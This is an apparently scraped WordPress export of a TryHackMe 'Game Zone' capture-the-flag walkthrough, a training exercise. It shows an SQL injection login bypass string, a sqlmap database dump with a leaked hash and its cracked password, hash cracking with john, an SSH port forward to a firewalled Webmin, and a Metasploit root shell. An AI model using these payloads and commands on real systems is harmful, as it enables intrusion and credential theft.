{"id":131304,"date":"2023-01-19T11:18:34","date_gmt":"2023-01-19T11:18:34","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1071170"},"modified":"2023-01-19T11:18:34","modified_gmt":"2023-01-19T11:18:34","slug":"tryhackme-game-zone-walkthrough","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2023\/01\/19\/tryhackme-game-zone-walkthrough\/","title":{"rendered":"TryHackMe \u2013 Game Zone Walkthrough"},"content":{"rendered":"\n<div class=\"kk-star-ratings kksr-auto kksr-align-left kksr-valign-top\" data-payload='{&quot;align&quot;:&quot;left&quot;,&quot;id&quot;:&quot;1071170&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;top&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;1&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;Rate this post&quot;,&quot;legend&quot;:&quot;5\\\/5 - (1 vote)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;{score}\\\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}'>\n<div class=\"kksr-stars\">\n<div class=\"kksr-stars-inactive\">\n<div class=\"kksr-star\" data-star=\"1\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"2\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"3\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"4\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div 
class=\"kksr-star\" data-star=\"5\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"kksr-stars-active\" style=\"width: 142.5px;\">\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/div>\n<div class=\"kksr-legend\" style=\"font-size: 19.2px;\"> 5\/5 &#8211; (1 vote) <\/div>\n<\/p><\/div>\n<figure class=\"wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube\"><a href=\"https:\/\/blog.finxter.com\/tryhackme-game-zone-walkthrough\/\"><img decoding=\"async\" src=\"https:\/\/blog.finxter.com\/wp-content\/plugins\/wp-youtube-lyte\/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2F9VbXoi9heZM%2Fhqdefault.jpg\" alt=\"YouTube Video\"><\/a><figcaption><\/figcaption><\/figure>\n<h2>CHALLENGE OVERVIEW<\/h2>\n<ul>\n<li><strong>Link<\/strong>: <a href=\"https:\/\/tryhackme.com\/room\/gamezone\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/tryhackme.com\/room\/gamezone<\/a><\/li>\n<li><strong>Difficulty<\/strong>: Easy<\/li>\n<li><strong>Target<\/strong>: user and root flags on a Linux server<\/li>\n<li><strong>Highlights<\/strong>: leveraging port forwarding to expose a webservice from behind a firewall, using <code>sqlmap<\/code> to find a username and hashed 
password<\/li>\n<li><strong>Tools used<\/strong>: <code>sqlmap<\/code>, <code>nmap<\/code>, <code>dirb<\/code>, <code>burpsuite<\/code>, <code>hydra<\/code>, <code>john the ripper<\/code>, <code>metasploit<\/code><\/li>\n<li><strong>Tags<\/strong>: <em>sqli, hashcracking, metasploit, ssh tunnel<\/em><\/li>\n<\/ul>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"372\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-206-1024x372.png\" alt=\"\" class=\"wp-image-1071175\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-206-1024x372.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-206-300x109.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-206-768x279.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-206.png 1344w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<h2>BACKGROUND<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"684\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-215-1024x684.png\" alt=\"\" class=\"wp-image-1071207\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-215-1024x684.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-215-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-215-768x513.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-215.png 1053w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>In this Linux capture-the-flag (CTF) challenge we are tasked with hacking into a game review website\u2019s server and finding a way to gain root privileges. 
Let\u2019s go!<\/p>\n<h2>IPs<\/h2>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">export targetIP=10.10.163.79\nexport myIP=10.6.2.23<\/pre>\n<h2>ENUMERATION\/RECON<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"682\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-216-1024x682.png\" alt=\"\" class=\"wp-image-1071212\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-216-1024x682.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-216-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-216-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-216.png 1055w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>Let\u2019s kick things off with our standard <code>nmap<\/code> and <code>dirb<\/code> scans. We\u2019ll let these run while we go ahead and walk the website looking for interesting leads.<\/p>\n<p>To find the character&#8217;s name on the main page, we can do a reverse image search on google. I\u2019ve played this title before but forgot his name, so I just googled \u201c<em>hitman game character name<\/em>\u201d to find the answer to our first question. 
(agent 47)<\/p>\n<h2>NMAP SCAN RESULTS<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"653\" height=\"535\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-207.png\" alt=\"\" class=\"wp-image-1071177\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-207.png 653w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-207-300x246.png 300w\" sizes=\"auto, (max-width: 653px) 100vw, 653px\" \/><\/figure>\n<\/div>\n<h2>DIRB SCAN RESULTS<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"479\" height=\"654\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-208.png\" alt=\"\" class=\"wp-image-1071178\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-208.png 479w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-208-220x300.png 220w\" sizes=\"auto, (max-width: 479px) 100vw, 479px\" \/><\/figure>\n<\/div>\n<h2>WALK THE WEBSITE<\/h2>\n<p>We see a login portal on the landing page of our target IP. 
We also look at the <code>\/images<\/code> folder that <code>dirb<\/code> found, but nothing remarkable is there at first glance.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"489\" height=\"543\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-209.png\" alt=\"\" class=\"wp-image-1071179\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-209.png 489w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-209-270x300.png 270w\" sizes=\"auto, (max-width: 489px) 100vw, 489px\" \/><\/figure>\n<\/div>\n<p>Due to a lack of proper data sanitization, we discover that the login can be bypassed by entering the following username and leaving the password blank:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">' or 1=1 -- -<\/pre>\n<p>The login trick works, and we are presented with a search box.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"484\" height=\"156\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-210.png\" alt=\"\" class=\"wp-image-1071180\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-210.png 484w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-210-300x97.png 300w\" sizes=\"auto, (max-width: 484px) 100vw, 484px\" \/><\/figure>\n<\/div>\n<h2>INITIAL FOOTHOLD &#8211; INTERCEPT A POST REQUEST WITH BURP<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"469\" height=\"703\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-218.png\" alt=\"\" class=\"wp-image-1071217\" 
srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-218.png 469w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-218-200x300.png 200w\" sizes=\"auto, (max-width: 469px) 100vw, 469px\" \/><\/figure>\n<\/div>\n<p>Let\u2019s fire up <code>burpsuite<\/code> now to intercept an HTTP-post request made with this search box.<\/p>\n<p>Intercepted HTTP-post request:<\/p>\n<pre class=\"wp-block-preformatted\"><code>POST \/portal.php HTTP\/1.1\nHost: 10.10.134.32\nContent-Length: 17\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/10.10.134.32\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/105.0.5195.102 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/10.10.134.32\/portal.php\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: PHPSESSID=v82et4dbp2fsr264tqhipmr1k5\nConnection: close searchitem=hitman<\/code>\n<\/pre>\n<p>We\u2019ll save this request in a file titled <code>req<\/code>. <\/p>\n<p>If you use <code>burpsuite<\/code> to capture the request, you can directly download it as a file. 
A word of caution: Using Firefox developer mode to intercept and save the request saved it double-spaced for some reason, and I suspect the formatting caused it to screw up the <code>sqlmap<\/code> command.\u00a0<\/p>\n<h2>USING SQLMAP TO EXTRACT THE FULL DATABASE\u00a0<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"684\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-217-1024x684.png\" alt=\"\" class=\"wp-image-1071214\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-217-1024x684.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-217-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-217-768x513.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-217.png 1053w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>With the following command, we can instruct <code>sqlmap<\/code> to attempt to download (dump) the entire database and search for login username and hashed password.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sqlmap -r req --dbms=mysql --dump --level 5<\/pre>\n<p>It worked! We see that the database stores a list of game titles and reviews. <\/p>\n<p>The most interesting piece of information here is the password. It looks like a hashed password. 
We can use an online hash identifier program like hashes.com to find out the hash type.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">+------------------------------------------------------------------+----------+\n| pwd                                                              | username |\n+------------------------------------------------------------------+----------+\n| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47  |\n+------------------------------------------------------------------+----------+\n<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"948\" height=\"427\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-211.png\" alt=\"\" class=\"wp-image-1071185\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-211.png 948w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-211-300x135.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-211-768x346.png 768w\" sizes=\"auto, (max-width: 948px) 100vw, 948px\" \/><\/figure>\n<\/div>\n<p>The 64 hex characters indicate that it is probably a SHA256 hash (a one-way digest, not an encrypted string). 
Now it\u2019s time to \u2026<\/p>\n<h2>CRACK THAT HASH WITH JOHN (THE RIPPER)!<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"682\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-219-1024x682.png\" alt=\"\" class=\"wp-image-1071220\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-219-1024x682.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-219-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-219-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-219.png 1055w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">john hash.txt --wordlist=\/home\/kalisurfer\/hacking-tools\/rockyou.txt --format=Raw-SHA256<\/pre>\n<p><code>rockyou.txt<\/code> is a legendary leaked database of passwords (14,344,391 passwords!)<\/p>\n<p>Output:<\/p>\n<pre class=\"wp-block-preformatted\"><code>Using default input encoding: UTF-8\nLoaded 1 password hash (Raw-SHA256 [SHA256 512\/512 AVX512BW 16x])\nWarning: poor OpenMP scalability for this hash type, consider --fork=4\nWill run 4 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nvideogamer124\t(?)\n1g 0:00:00:00 DONE (2023-01-14 12:23) 1.449g\/s 4369Kp\/s 4369Kc\/s 4369KC\/s vimivera..tyler912\nUse the \"--show --format=Raw-SHA256\" options to display all of the cracked passwords reliably\nSession completed<\/code>\n<\/pre>\n<\/p>\n<h2>SSH INTO THE BOX AND GRAB THE USER FLAG<\/h2>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" 
data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ssh agent47@10.10.151.6<\/pre>\n<p>We are in!<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">agent47@gamezone:~$ cat user.txt\n64\u2014---digits omitted\u2014--------5c\n<\/pre>\n<h2>PRIVILEGE ESCALATION<\/h2>\n<p>This box requires a two-step process of port forwarding via ssh and then throwing a reverse meterpreter shell to a listener. <\/p>\n<p>Let\u2019s check for hidden services running on ports that may be behind a firewall. We can use the ss utility to check out all of the data connections from each port on our target machine.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">agent47@gamezone:~$ ss -t -u -l -p -n<\/pre>\n<p>Output:<\/p>\n<pre class=\"wp-block-preformatted\"><code>Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port\nudp UNCONN 0 0 *:10000 *:*<\/code><\/pre>\n<p>This first line is curious. It appears that a service is running on port 10000 of the target system. <\/p>\n<p>Let\u2019s go ahead and port forward to see what is lying behind the firewall. 
Port 10000 is typically used for server tools and configuration services.<\/p>\n<h2>SET UP PORT FORWARD WITH SSH<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"469\" height=\"703\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-220.png\" alt=\"\" class=\"wp-image-1071221\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-220.png 469w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-220-200x300.png 200w\" sizes=\"auto, (max-width: 469px) 100vw, 469px\" \/><\/figure>\n<\/div>\n<p>The following command opens a local port forward over <code>ssh<\/code> (<code>-L<\/code>): port 10000 on our own machine is tunneled to port 10000 on the target\u2019s loopback interface, where the firewall does not apply:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ssh -L 10000:localhost:10000 agent47@10.10.151.64\npassword: \u2014-cracked-password\u2014-\nWelcome to Ubuntu 16.04.6 LTS (GNU\/Linux 4.4.0-159-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n109 packages can be updated.\n68 updates are security updates.\n\nLast login: Sat Jan 14 18:21:17 2023 from 10.6.2.23\nagent47@gamezone:~$\n<\/pre>\n<p>We are connected now with port forwarding in place. 
Let\u2019s navigate in our browser to <code>http:\/\/localhost:10000<\/code>, the local end of the tunnel.<\/p>\n<p>After logging in with the same <code>username:password<\/code> combination we used with <code>ssh<\/code>, we are given access to a webmin portal.<\/p>\n<h2>PRIVESC WITH METASPLOIT<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"682\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-221-1024x682.png\" alt=\"\" class=\"wp-image-1071223\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-221-1024x682.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-221-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-221-768x511.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-221.png 1056w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>Searching for <code>webmin<\/code> in Metasploit brings up the following Metasploit module.<\/p>\n<p>Let\u2019s use it and set it up with the following options:<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"863\" height=\"608\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-212.png\" alt=\"\" class=\"wp-image-1071190\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-212.png 863w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-212-300x211.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-212-768x541.png 768w\" sizes=\"auto, (max-width: 863px) 100vw, 863px\" \/><\/figure>\n<\/div>\n<p>Let it rip!<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" 
data-enlighter-group=\"\">run<\/pre>\n<p>And it connects us to a shell. We can use the following command to interact with the meterpreter on session 0.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sessions -i 0<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"383\" height=\"349\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-213.png\" alt=\"\" class=\"wp-image-1071191\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-213.png 383w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-213-300x273.png 300w\" sizes=\"auto, (max-width: 383px) 100vw, 383px\" \/><\/figure>\n<\/div>\n<p>And we now have our root flag! Thanks for reading this write-up.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>5\/5 &#8211; (1 vote) CHALLENGE OVERVIEW Link: https:\/\/tryhackme.com\/room\/gamezone Difficulty: Easy Target: user and root flags on a Linux server Highlights: leveraging port forwarding to expose a webservice from behind a firewall, using sqlmap to find a username and hashed password Tools used: sqlmap, nmap, dirb, burpsuite, hydra, john the ripper, metasploit Tags: sqli, hashcracking, metasploit, 
[&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-131304","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131304","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=131304"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131304\/revisions"}],"wp:attachment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/media?parent=131304"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=131304"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=131304"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}